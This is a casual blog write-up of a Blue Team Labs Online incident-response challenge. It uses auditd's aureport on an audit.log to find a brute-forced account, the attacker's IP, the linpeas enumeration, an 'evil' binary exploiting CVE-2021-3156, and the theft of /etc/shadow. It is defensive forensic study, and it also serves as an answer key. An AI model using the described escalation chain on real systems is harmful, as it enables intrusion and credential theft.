Post

Paranoid

Posted Updated
Preview Image
By 2$0b.|3r0th3rcc 3 min read

Hi :))

Before jumping in, look at the tag and file of the article

Audit.log file, go to google search, there is a tool for it

yeh, there is an auditd tool lol XD

1
2

sudo apt-get update
sudo apt-get -y install auditd

Remember to log in to root, comrades -..-

After downloading, there are many tools, it’s not convenient to explain here hehe

image

After reading the instructions, to get an overview, use the command line below

-if,--input <Input File name>: use this file as input

--summary: sorted totals for main object in report

1
2

aureport --summary -if audit.log

image

okee, swim to solve this challenge

What account was compromised? (2 points)

To know which account is compromised, look at the authentication report

-au,--auth: Authentication report

1
2

aureport -au -if audit.log

According to the report, left to right will be date, time, acct, host, term, path, success, event

Wow maybe that’s it, i’m a newbie (.-.) , sorry if it’s wrong hehe

image

btlo

What attack type was used to gain initial access? (2 points)

From the picture I took above, it could only be a brute force attack =)) returning too many events in 1 second

brute force

What is the attacker’s IP address? (2 points)

I listed it above as the host column

192.168.4.155

What tool was used to perform system enumeration? (2 points)

If the hacker already has permission, then see what he typed on the console

--tty: Report about tty keystrokes

1
2

aureport --tty -if audit.log

From the image , the hacker wget the command file linpeas.sh from his machine with port 8000

image

After researching on Google, LinPeas is a command file that searches for paths to elevate privileges on Linux/Unix*/MacOS hosts.

1
2

lsb_release -a

The command lsb_release -a is used to display version information and description of a Linux distribution based on the LSB (Linux Standard Base) standard.

image

Then he wget file evil.tar.gz from his computer, the attacker executed the command make … wait pause here, what is the make command used for

There is a document for you to clearly understand the make command

But to put it simply, it will use information from the description file, which the program creator has completed, which helps eliminate repetition and speed up compilation as well as save time.

then he executed ./evil with argument 0, I don’t really understand here @~@, and then he erased his tracks and escaped

What is the name of the binary and pid used to gain root? (3 points)

After analyzing above, we know that there is a command file that was executed as evil, ok so let’s list the ids of the executing processes.

-p,--pid: Pid report

I forgot, there will be a lot of them and not very related to what we are looking for, let’s filter them with grep 'evil'

1
2

aureport -p -if audit.log | grep 'evil'

From left to right we have date, pid, path, UID, GID, event ID

image

evil, 829992

What CVE was exploited to gain root access? (Do your research!) (3 points)

hehe too easy

image

CVE-2021-3560

boom!, wrong right =))) I also thought it would be easy to eat kkk

keep searching

try it and see if it’s right

image

CVE-2021-3156

ohhhhhhhhhhhhhhh~ that’s righttttttt

Here is it CVE-2021-3156

What type of vulnerability is this? (3 points)

right ~

image

Heap-Based Buffer Overflow

What file was exfiltrated once root was gained? (3 points)

I’ve been confused about this all morning :))

And after looking back, I realized I missed it :_)

image

/etc/shadow

ok okay I’m tired TT

goodbye, thank you for reading until now //~//

Alt Text

BTLO, Incident Response
AUReport Linux CLI Blue Team btlo auditd
This post is licensed under CC BY 4.0 by the author.